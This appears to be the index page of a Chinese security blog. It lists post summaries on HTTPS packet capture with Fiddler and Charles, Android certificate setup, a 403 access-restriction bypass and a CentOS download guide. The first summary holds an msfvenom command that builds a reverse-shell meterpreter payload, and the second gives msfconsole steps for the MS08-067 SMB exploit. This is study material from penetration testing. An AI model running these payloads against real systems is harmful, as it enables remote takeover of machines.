摘要: 0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/me 阅读全文
posted @ 2022-05-01 20:03 大柿子 阅读(1275) 评论(0) 推荐(0) 编辑
摘要: 原文:https://blog.csdn.net/weixin_42140534/article/details/117551767 msf获取shell 启动 msfconsole 搜索某个模块 search ms08-067 使用某个模块 use exploit/windows/smb/ms08 阅读全文
posted @ 2022-05-01 19:55 大柿子 阅读(2003) 评论(1) 推荐(1) 编辑
摘要: 1、CentOS7的下载 官网下载地址:https://www.centos.org/download/。 进入CentOS下载官网,找到64位的CentOS7版本。 点进来后,发现它给我们列出了所在区域可用镜像源(可以说是非常的良心的),我们随便选择一个,这里以阿里云的为例: 选择标准的CentO 阅读全文
posted @ 2022-04-06 11:59 大柿子 阅读(53) 评论(0) 推荐(0) 编辑
摘要: 文章来源:酒仙桥六号部队 链接:http://www.sins7.cn/remember-a-403-bypass-technique/ 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公网出口访问,对于IP的访问限制是否存在缺陷可以绕过,外网进行 阅读全文
posted @ 2022-03-28 11:14 大柿子 阅读(1827) 评论(0) 推荐(0) 编辑
摘要: 作者:两袖青蛇 链接地址:https://m.sec-in.com/article/1378?action=1645505535606 前言 在日常渗透项目中,app渗透可以说是家常便饭了。但由于安卓7以后不信任用户安装的证书,很多时候无法正常抓取数据包,很是烦人。网上大多数的解决方法都是去买一个低 阅读全文
posted @ 2022-02-22 12:58 大柿子 阅读(1017) 评论(0) 推荐(0) 编辑
摘要: Android手机证书的格式是crt,如果格式是gem需要重命名修改文件格式为crt 然后愉快的抓包之路就开始了 ps:Android7.0以上可能会遇到显示unknown的状况,让人抓狂。这原因是Android7.0 之后默认不信任用户添加到系统的CA证书,也就是说对基于 SDK24 及以上的AP 阅读全文
posted @ 2022-02-10 12:03 大柿子 阅读(725) 评论(0) 推荐(0) 编辑
摘要: 引言 HTTP应用层的抓包已经成为日常工作测试与调试中的重要一环,最近接触新项目突然之间发现之前的抓包手段都不好使了,顿时模块与模块之间的前端与服务之间的交互都变成了不可见,整个人都好像被蒙住了眼睛。 其实自己也很早就发现平时使用的支付宝等APP使用Fiddler 或 Charles这类代理抓包软件 阅读全文
posted @ 2022-02-10 11:28 大柿子 阅读(3572) 评论(0) 推荐(1) 编辑
摘要: 作者:还是那个没头脑链接:https://www.jianshu.com/p/a49edd734d23 【文章仅作备份学习之用,无商业用途】 【问题现象】 在抓https或者http2.0协议请求时,Request和Response显示乱码了: 【解决办法】 第一步:点击 【工具栏-->Proxy- 阅读全文
posted @ 2022-02-08 18:04 大柿子 阅读(2563) 评论(0) 推荐(0) 编辑
摘要: 原文:https://www.cnblogs.com/wanglu/p/11574436.html 作者:三月路 [文章仅作备份学习之用] 关于请求节点为unknown、内容为乱码和手机端无法访问网络其实都是手机端证书配置问题导致,有的配置后还是存在问题是因为新的ios系统需要Iphone设置关于本 阅读全文
posted @ 2022-02-08 18:02 大柿子 阅读(1927) 评论(0) 推荐(0) 编辑
摘要: 作者:李二初 原文链接:https://www.jianshu.com/p/dd6a24f0c73d (仅作备份用) 一、Charles简介 1.Charles的功能 Charles 是在 PC 端常用的网络封包截取工具,在做移动开发时,我们为了调试与服务器端的网络通讯协议,常常需要截取网络封包来分 阅读全文
posted @ 2022-02-07 17:47 大柿子 阅读(516) 评论(0) 推荐(0) 编辑